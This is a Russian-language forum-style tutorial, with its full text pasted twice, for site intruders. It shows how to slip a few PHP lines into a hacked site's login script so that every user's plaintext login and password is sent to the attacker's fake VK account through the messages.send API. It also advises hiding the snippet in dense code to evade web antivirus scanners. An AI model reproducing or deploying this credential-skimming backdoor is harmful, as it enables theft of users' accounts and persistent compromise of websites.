Сижу я тут, и меня осенило, что можно сливать логины и пароли со взломанных сайтов без расшифровки паролей(пусть они в БД хоть как будут запаролены :) ).
При этом даже если ваш шелл удалят, вы все равно сможете получать актуальные пароли(даже если их будут менять каждую минуту), в том числе и новорегов!
Заинтригованы?
Ну, погнали!
Что нам нужно:
- фейковый акк в вк (хоть пустой, пофиг). А лучше два.
- Небольшое знание PHP
- Все :)
Итак, вот мы взломали сайт, залили шелл, но БД весит несколько ГБ, да и шифр хрен знает какой, и вообще нет желания разбираться с этим. И тут вы подумали, что админ шелл может найти и удалить, а доступ к логинам и паролям терять не хочется. В том числе и к новорегам.
Тут нам поможет наш VK. Мы допишем немного форму авторизации, чтобы логины и пароли прилетали к нам в личные сообщения, как только кто-то авторизовывается.
В чем плюсы способа?
- эту доработку не спалит ни один WEB антивирус(AI-BOLIT допустим)
- в большом коде сложно заметить этот кусок
- у нас на руках всегда актуальные данные
Короче, хватит болтовни!
Приступаем!
Заходим на свой фейк, переходим по этой ССЫЛКЕ
Даем доступ, сверху в адресной строке копируем наш Access_token
Теперь ищем на сайте PHP файл, отвечающий за вывод формы авторизации (бывает в index.php или в login.php чаще всего, но может быть и в других местах)
Теперь берем код, который я написал ниже и вставляем его куда нибудь в тело скрипта авторизации, в то место, где много кода (чтобы не так выделялось)
$text = "$Log:$Pass";
$token = '';
Код:
В переменную $token = ''; в кавычки вставляем наш токен от фейковой страницы
В строке:
Код:
Меняем 12345 на ID вашей страницы в вк, на которую будут приходить пароли(обязательно циферный!)
Теперь самое сложное!
Нужно найти в коде сайта 2 переменные, которые хранят логин и пароль.
Допустим на сайте логин хранится в переменной $logauth а пароль в $passauth
Тогда нам нужно наш код ( $text = "$Log:$Pass"; )
Изменить на $text = "$logauth:$passauth";
Все, сохраняем и пробуем авторизоваться на сайте. Данные пришли? Великолепно! Значит вы все сделали правильно!
Ну, а для знающих PHP дополнить код, если конечно им нужно, они смогут сами!
А для незнающих этого более чем достаточно, чтобы получать всегда логины и пароли в чистом виде!
При этом даже если ваш шелл удалят, вы все равно сможете получать актуальные пароли(даже если их будут менять каждую минуту), в том числе и новорегов!
Заинтригованы?
Ну, погнали!
Что нам нужно:
- фейковый акк в вк (хоть пустой, пофиг). А лучше два.
- Небольшое знание PHP
- Все :)
Итак, вот мы взломали сайт, залили шелл, но БД весит несколько ГБ, да и шифр хрен знает какой, и вообще нет желания разбираться с этим. И тут вы подумали, что админ шелл может найти и удалить, а доступ к логинам и паролям терять не хочется. В том числе и к новорегам.
Тут нам поможет наш VK. Мы допишем немного форму авторизации, чтобы логины и пароли прилетали к нам в личные сообщения, как только кто-то авторизовывается.
В чем плюсы способа?
- эту доработку не спалит ни один WEB антивирус(AI-BOLIT допустим)
- в большом коде сложно заметить этот кусок
- у нас на руках всегда актуальные данные
Короче, хватит болтовни!
Приступаем!
Заходим на свой фейк, переходим по этой ССЫЛКЕ
Даем доступ, сверху в адресной строке копируем наш Access_token
Теперь ищем на сайте PHP файл, отвечающий за вывод формы авторизации (бывает в index.php или в login.php чаще всего, но может быть и в других местах)
Теперь берем код, который я написал ниже и вставляем его куда нибудь в тело скрипта авторизации, в то место, где много кода (чтобы не так выделялось)
$text = "$Log:$Pass";
$token = '';
Код:
Код:
$post = file_get_contents ('https://api.vk.com/method/messages.send?user_id=12345&message='.urlencode($text).'&access_token='.$token);В переменную $token = ''; в кавычки вставляем наш токен от фейковой страницы
В строке:
Код:
Код:
$post = file_get_contents ('https://api.vk.com/method/messages.send?user_id=12345&message='.urlencode($text).'&access_token='.$token);Меняем 12345 на ID вашей страницы в вк, на которую будут приходить пароли(обязательно циферный!)
Теперь самое сложное!
Нужно найти в коде сайта 2 переменные, которые хранят логин и пароль.
Допустим на сайте логин хранится в переменной $logauth а пароль в $passauth
Тогда нам нужно наш код ( $text = "$Log:$Pass"; )
Изменить на $text = "$logauth:$passauth";
Все, сохраняем и пробуем авторизоваться на сайте. Данные пришли? Великолепно! Значит вы все сделали правильно!
Ну, а для знающих PHP дополнить код, если конечно им нужно, они смогут сами!
А для незнающих этого более чем достаточно, чтобы получать всегда логины и пароли в чистом виде!
